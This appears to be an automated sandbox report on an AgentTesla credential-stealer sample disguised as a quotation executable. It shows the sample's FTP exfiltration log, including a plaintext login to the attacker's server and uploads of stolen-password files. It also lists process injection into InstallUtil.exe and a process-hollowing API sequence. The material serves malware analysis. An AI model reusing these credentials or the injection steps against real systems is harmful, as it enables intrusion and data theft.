                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                              Oct 10, 2024 10:00:02.729336977 CEST21497055.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                              Oct 10, 2024 10:00:02.729372978 CEST21497055.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                              Oct 10, 2024 10:00:02.729645014 CEST4970521192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                              Oct 10, 2024 10:00:02.953480005 CEST21497055.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                              Oct 10, 2024 10:00:02.953634977 CEST4970521192.168.2.55.2.84.236PASS Fineboy777@
                                              Oct 10, 2024 10:00:03.262085915 CEST21497055.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                              Oct 10, 2024 10:00:04.375741959 CEST21497055.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:04.375963926 CEST4970521192.168.2.55.2.84.236PWD
                                              Oct 10, 2024 10:00:04.378875017 CEST21497055.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:04.378923893 CEST21497055.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:04.378988981 CEST21497055.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:04.693784952 CEST4970521192.168.2.55.2.84.236PWD
                                              Oct 10, 2024 10:00:05.317233086 CEST21497055.2.84.236192.168.2.5257 "/" is your current location
                                              Oct 10, 2024 10:00:05.317454100 CEST4970521192.168.2.55.2.84.236TYPE I
                                              Oct 10, 2024 10:00:05.541204929 CEST21497055.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                              Oct 10, 2024 10:00:05.541368961 CEST4970521192.168.2.55.2.84.236PASV
                                              Oct 10, 2024 10:00:05.765494108 CEST21497055.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,199,11)
                                              Oct 10, 2024 10:00:05.772082090 CEST4970521192.168.2.55.2.84.236STOR PW_user-721680_2024_10_10_04_00_00.html
                                              Oct 10, 2024 10:00:06.388159990 CEST21497055.2.84.236192.168.2.5150 Accepted data connection
                                              Oct 10, 2024 10:00:06.613183022 CEST21497055.2.84.236192.168.2.5226-File successfully transferred
                                              226-File successfully transferred226 0.225 seconds (measured here), 1.39 Kbytes per second
                                              Oct 10, 2024 10:00:18.424053907 CEST21497645.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                              Oct 10, 2024 10:00:18.424992085 CEST4976421192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                              Oct 10, 2024 10:00:18.646148920 CEST21497645.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                              Oct 10, 2024 10:00:18.647042990 CEST4976421192.168.2.55.2.84.236PASS Fineboy777@
                                              Oct 10, 2024 10:00:18.961267948 CEST21497645.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                              Oct 10, 2024 10:00:19.194295883 CEST21497645.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:19.194484949 CEST4976421192.168.2.55.2.84.236PWD
                                              Oct 10, 2024 10:00:19.415715933 CEST21497645.2.84.236192.168.2.5257 "/" is your current location
                                              Oct 10, 2024 10:00:19.415919065 CEST4976421192.168.2.55.2.84.236TYPE I
                                              Oct 10, 2024 10:00:19.636888981 CEST21497645.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                              Oct 10, 2024 10:00:19.637069941 CEST4976421192.168.2.55.2.84.236PASV
                                              Oct 10, 2024 10:00:19.858268976 CEST21497645.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,251,177)
                                              Oct 10, 2024 10:00:19.864118099 CEST4976421192.168.2.55.2.84.236STOR PW_user-721680_2024_10_10_04_00_16.html
                                              Oct 10, 2024 10:00:20.477410078 CEST21497645.2.84.236192.168.2.5150 Accepted data connection
                                              Oct 10, 2024 10:00:20.699326992 CEST21497645.2.84.236192.168.2.5226-File successfully transferred
                                              226-File successfully transferred226 0.223 seconds (measured here), 1.40 Kbytes per second
                                              Oct 10, 2024 10:00:28.684113026 CEST21498125.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                              Oct 10, 2024 10:00:28.684361935 CEST4981221192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                              Oct 10, 2024 10:00:28.912812948 CEST21498125.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                              Oct 10, 2024 10:00:28.913021088 CEST4981221192.168.2.55.2.84.236PASS Fineboy777@
                                              Oct 10, 2024 10:00:29.159882069 CEST21498125.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                              Oct 10, 2024 10:00:29.388379097 CEST21498125.2.84.236192.168.2.5504 Unknown command
                                              Oct 10, 2024 10:00:29.388624907 CEST4981221192.168.2.55.2.84.236PWD
                                              Oct 10, 2024 10:00:29.616877079 CEST21498125.2.84.236192.168.2.5257 "/" is your current location
                                              Oct 10, 2024 10:00:29.617017984 CEST4981221192.168.2.55.2.84.236TYPE I
                                              Oct 10, 2024 10:00:29.845711946 CEST21498125.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                              Oct 10, 2024 10:00:29.846740961 CEST4981221192.168.2.55.2.84.236PASV
                                              Oct 10, 2024 10:00:30.075205088 CEST21498125.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,253,82)
                                              Oct 10, 2024 10:00:30.081106901 CEST4981221192.168.2.55.2.84.236STOR PW_user-721680_2024_10_10_04_00_26.html
                                              Oct 10, 2024 10:00:30.699074030 CEST21498125.2.84.236192.168.2.5150 Accepted data connection
                                              Oct 10, 2024 10:00:30.928486109 CEST21498125.2.84.236192.168.2.5226-File successfully transferred
                                              226-File successfully transferred226 0.229 seconds (measured here), 1.36 Kbytes per second

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:59:53
                                              Start date:10/10/2024
                                              Path:C:\Users\user\Desktop\Request for Quotation-537262227-04.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Request for Quotation-537262227-04.exe"
                                              Imagebase:0x3e0000
                                              File size:88'064 bytes
                                              MD5 hash:914F3A5BDB348B468C12C2EB6233CEBF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2176781654.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:03:59:59
                                              Start date:10/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              Imagebase:0x5e0000
                                              File size:42'064 bytes
                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2323828873.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2323828873.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:04:00:10
                                              Start date:10/10/2024
                                              Path:C:\Users\user\AppData\Roaming\Oltpxw.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Oltpxw.exe"
                                              Imagebase:0x580000
                                              File size:88'064 bytes
                                              MD5 hash:914F3A5BDB348B468C12C2EB6233CEBF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2322212414.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 18%, ReversingLabs
                                              • Detection: 14%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:00:15
                                              Start date:10/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              Imagebase:0x700000
                                              File size:42'064 bytes
                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2422576609.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2422576609.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:00:19
                                              Start date:10/10/2024
                                              Path:C:\Users\user\AppData\Roaming\Oltpxw.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Oltpxw.exe"
                                              Imagebase:0x9d0000
                                              File size:88'064 bytes
                                              MD5 hash:914F3A5BDB348B468C12C2EB6233CEBF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:04:00:24
                                              Start date:10/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              Imagebase:0x340000
                                              File size:42'064 bytes
                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3367618614.0000000002647000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.2%
                                                Dynamic/Decrypted Code Coverage:98.4%
                                                Signature Coverage:2.8%
                                                Total number of Nodes:320
                                                Total number of Limit Nodes:13
                                                execution_graph 62199 6411141 62202 641d618 62199->62202 62204 641d63f 62202->62204 62206 641da68 62204->62206 62207 641dab0 VirtualProtect 62206->62207 62209 641115f 62207->62209 62258 6418463 62259 641b4cd 62258->62259 62262 641e988 62259->62262 62263 641e99d 62262->62263 62266 641e9d8 62263->62266 62268 641e9ff 62266->62268 62270 641eae0 62268->62270 62271 641eb20 VirtualAlloc 62270->62271 62273 641b4f1 62271->62273 62274 2724950 62277 2724508 62274->62277 62276 272495e 62278 2724513 62277->62278 62281 272461c 62278->62281 62280 2724a95 62280->62276 62282 2724627 62281->62282 62285 272464c 62282->62285 62284 2724b7a 62284->62280 62286 2724657 62285->62286 62289 272467c 62286->62289 62288 2724c7c 62288->62284 62290 2724687 62289->62290 62296 2727774 62290->62296 62292 2727cb9 62292->62288 62293 2727a90 62293->62292 62301 272c798 62293->62301 62306 272c78a 62293->62306 62297 272777f 62296->62297 62298 272927a 62297->62298 62311 27292cb 62297->62311 62315 27292d8 62297->62315 62298->62293 62302 272c7b9 62301->62302 62303 272c7dd 62302->62303 62319 272c948 62302->62319 62323 272c938 62302->62323 62303->62292 62307 272c7b9 62306->62307 62308 272c7dd 62307->62308 62309 272c948 2 API calls 62307->62309 62310 272c938 2 API calls 62307->62310 62308->62292 62309->62308 62310->62308 62312 272931b 62311->62312 62313 2729326 KiUserCallbackDispatcher 62312->62313 62314 2729350 62312->62314 62313->62314 62314->62298 62316 272931b 62315->62316 62317 2729326 KiUserCallbackDispatcher 62316->62317 62318 2729350 62316->62318 62317->62318 62318->62298 62321 272c955 62319->62321 62320 272c98f 62320->62303 62321->62320 62327 272b500 62321->62327 62324 272c955 62323->62324 62325 272c98f 62324->62325 62326 272b500 2 API calls 62324->62326 62325->62303 62326->62325 62328 272b50b 62327->62328 62330 272d6a8 62328->62330 62331 272ccfc 62328->62331 62332 272cd07 62331->62332 62333 272467c 2 API calls 62332->62333 62334 272d717 62333->62334 62334->62330 62438 6397ddc 62439 6397de6 62438->62439 62443 63c7d28 62439->62443 62447 63c7d18 62439->62447 62444 63c7d3d 62443->62444 62451 63c7f9b 62444->62451 62448 63c7d28 62447->62448 62450 63c7f9b 2 API calls 62448->62450 62449 6397e24 62450->62449 62453 63c7f89 62451->62453 62452 63c8098 62453->62452 62454 63c6209 VirtualProtect 62453->62454 62455 63c6210 VirtualProtect 62453->62455 62454->62453 62455->62453 62210 9fd118 62211 9fd130 62210->62211 62212 9fd18b 62211->62212 62214 641e0d0 62211->62214 62215 641e0f8 62214->62215 62218 641e590 62215->62218 62216 641e11f 62219 641e5bd 62218->62219 62220 641d618 VirtualProtect 62219->62220 62222 641e753 62219->62222 62221 641e744 62220->62221 62221->62216 62222->62216 62422 6410909 62423 6410928 62422->62423 62425 641d618 VirtualProtect 62423->62425 62424 6410953 62425->62424 62456 637f05f 62457 637eb95 62456->62457 62459 668fad0 62457->62459 62460 668fae5 62459->62460 62464 63a038a 62460->62464 62469 63a04f3 62460->62469 62465 63a0394 62464->62465 62466 63a04f6 62465->62466 62474 63a0828 62465->62474 62488 63a0818 62465->62488 62470 63a04f6 62469->62470 62471 63a0497 62469->62471 62471->62469 62472 63a0828 10 API calls 62471->62472 62473 63a0818 10 API calls 62471->62473 62472->62471 62473->62471 62475 63a083d 62474->62475 62502 63a104d 62475->62502 62507 63a111c 62475->62507 62512 63a1589 62475->62512 62517 63a120b 62475->62517 62522 63a1345 62475->62522 62528 63a0cb7 62475->62528 62533 63a12b7 62475->62533 62537 63a1526 62475->62537 62542 63a0b16 62475->62542 62547 63a0a60 62475->62547 62551 63a1443 62475->62551 62476 63a085f 62476->62465 62489 63a083d 62488->62489 62491 63a120b 2 API calls 62489->62491 62492 63a1589 2 API calls 62489->62492 62493 63a111c 2 API calls 62489->62493 62494 63a104d 2 API calls 62489->62494 62495 63a1443 2 API calls 62489->62495 62496 63a0a60 2 API calls 62489->62496 62497 63a0b16 2 API calls 62489->62497 62498 63a1526 2 API calls 62489->62498 62499 63a12b7 2 API calls 62489->62499 62500 63a0cb7 2 API calls 62489->62500 62501 63a1345 2 API calls 62489->62501 62490 63a085f 62490->62465 62491->62490 62492->62490 62493->62490 62494->62490 62495->62490 62496->62490 62497->62490 62498->62490 62499->62490 62500->62490 62501->62490 62503 63a1054 62502->62503 62556 63a1e38 62503->62556 62561 63a1e48 62503->62561 62504 63a09b5 62508 63a0cb7 62507->62508 62509 63a09b5 62507->62509 62584 63c5d18 62508->62584 62588 63c5d20 62508->62588 62513 63a15a6 62512->62513 62592 63c5e18 62513->62592 62596 63c5e20 62513->62596 62514 63a15f1 62518 63a1223 62517->62518 62520 63c5e18 WriteProcessMemory 62518->62520 62521 63c5e20 WriteProcessMemory 62518->62521 62519 63a1262 62520->62519 62521->62519 62523 63a1352 62522->62523 62525 63a09b5 62523->62525 62600 63c5fc8 62523->62600 62604 63c5fd0 62523->62604 62524 63a148d 62524->62476 62529 63a0cc1 62528->62529 62531 63c5d18 VirtualAllocEx 62529->62531 62532 63c5d20 VirtualAllocEx 62529->62532 62530 63a09b5 62531->62530 62532->62530 62608 63a34f0 62533->62608 62613 63a34e0 62533->62613 62534 63a12cf 62538 63a1529 62537->62538 62540 63c5e18 WriteProcessMemory 62538->62540 62541 63c5e20 WriteProcessMemory 62538->62541 62539 63a15f1 62540->62539 62541->62539 62543 63a0b32 62542->62543 62545 63c5e18 WriteProcessMemory 62543->62545 62546 63c5e20 WriteProcessMemory 62543->62546 62544 63a09b5 62545->62544 62546->62544 62626 63a3668 62547->62626 62631 63a3658 62547->62631 62548 63a09b5 62552 63a1467 62551->62552 62554 63c5fc8 NtResumeThread 62552->62554 62555 63c5fd0 NtResumeThread 62552->62555 62553 63a148d 62553->62476 62554->62553 62555->62553 62557 63a1e5f 62556->62557 62558 63a1e81 62557->62558 62566 63a1fd5 62557->62566 62571 63a2031 62557->62571 62558->62504 62562 63a1e5f 62561->62562 62563 63a1e81 62562->62563 62564 63a2031 2 API calls 62562->62564 62565 63a1fd5 2 API calls 62562->62565 62563->62504 62564->62563 62565->62563 62567 63a1fde 62566->62567 62576 63c55f5 62567->62576 62580 63c5600 62567->62580 62572 63a2056 62571->62572 62574 63c55f5 CreateProcessA 62572->62574 62575 63c5600 CreateProcessA 62572->62575 62573 63a2232 62574->62573 62575->62573 62577 63c5664 CreateProcessA 62576->62577 62579 63c57ec 62577->62579 62581 63c5664 CreateProcessA 62580->62581 62583 63c57ec 62581->62583 62585 63c5d60 VirtualAllocEx 62584->62585 62587 63c5d9d 62585->62587 62587->62509 62589 63c5d60 VirtualAllocEx 62588->62589 62591 63c5d9d 62589->62591 62591->62509 62593 63c5e68 WriteProcessMemory 62592->62593 62595 63c5ebf 62593->62595 62595->62514 62597 63c5e68 WriteProcessMemory 62596->62597 62599 63c5ebf 62597->62599 62599->62514 62601 63c6018 NtResumeThread 62600->62601 62603 63c604d 62601->62603 62603->62524 62605 63c6018 NtResumeThread 62604->62605 62607 63c604d 62605->62607 62607->62524 62609 63a3505 62608->62609 62618 63c58f8 62609->62618 62622 63c5900 62609->62622 62610 63a351e 62610->62534 62614 63a3505 62613->62614 62616 63c58f8 Wow64SetThreadContext 62614->62616 62617 63c5900 Wow64SetThreadContext 62614->62617 62615 63a351e 62615->62534 62616->62615 62617->62615 62619 63c5900 Wow64SetThreadContext 62618->62619 62621 63c598d 62619->62621 62621->62610 62623 63c5945 Wow64SetThreadContext 62622->62623 62625 63c598d 62623->62625 62625->62610 62627 63a367d 62626->62627 62629 63c58f8 Wow64SetThreadContext 62627->62629 62630 63c5900 Wow64SetThreadContext 62627->62630 62628 63a3696 62628->62548 62629->62628 62630->62628 62632 63a367d 62631->62632 62634 63c58f8 Wow64SetThreadContext 62632->62634 62635 63c5900 Wow64SetThreadContext 62632->62635 62633 63a3696 62633->62548 62634->62633 62635->62633 62426 272a9b8 62427 272aa00 GetModuleHandleW 62426->62427 62428 272a9fa 62426->62428 62429 272aa2d 62427->62429 62428->62427 62223 6397e32 62224 6397e3c 62223->62224 62228 637b220 62224->62228 62233 637b210 62224->62233 62225 6397e7a 62229 637b235 62228->62229 62238 637b2f3 62229->62238 62243 637b3e2 62229->62243 62230 637b24b 62230->62225 62234 637b220 62233->62234 62236 637b2f3 2 API calls 62234->62236 62237 637b3e2 2 API calls 62234->62237 62235 637b24b 62235->62225 62236->62235 62237->62235 62239 637b315 62238->62239 62240 637b675 62239->62240 62241 63c6209 VirtualProtect 62239->62241 62242 63c6210 VirtualProtect 62239->62242 62240->62230 62241->62239 62242->62239 62245 637b3e8 62243->62245 62244 637b675 62244->62230 62245->62244 62246 63c6209 VirtualProtect 62245->62246 62247 63c6210 VirtualProtect 62245->62247 62246->62245 62247->62245 62335 6397e88 62336 6397e92 62335->62336 62340 63cbc18 62336->62340 62347 63cbc08 62336->62347 62337 6397779 62341 63cbc2d 62340->62341 62342 63cbc43 62341->62342 62354 63cdb18 62341->62354 62359 63ccc13 62341->62359 62364 63cda14 62341->62364 62369 63cc83a 62341->62369 62342->62337 62348 63cbc18 62347->62348 62349 63cbc43 62348->62349 62350 63cdb18 2 API calls 62348->62350 62351 63cc83a 2 API calls 62348->62351 62352 63cda14 2 API calls 62348->62352 62353 63ccc13 2 API calls 62348->62353 62349->62337 62350->62349 62351->62349 62352->62349 62353->62349 62355 63cdb1e 62354->62355 62374 63c76ed 62355->62374 62378 63c76f8 62355->62378 62360 63ccc19 62359->62360 62361 63ccd7b 62360->62361 62382 63cf7b8 62360->62382 62387 63cf7a8 62360->62387 62365 63cda2e 62364->62365 62400 63cf958 62365->62400 62405 63cf968 62365->62405 62370 63cc849 62369->62370 62371 63ccd7b 62370->62371 62372 63cf7b8 2 API calls 62370->62372 62373 63cf7a8 2 API calls 62370->62373 62372->62370 62373->62370 62375 63c7753 RegOpenKeyExA 62374->62375 62377 63c77f5 62375->62377 62379 63c7753 RegOpenKeyExA 62378->62379 62381 63c77f5 62379->62381 62383 63cf7cd 62382->62383 62392 63c78b4 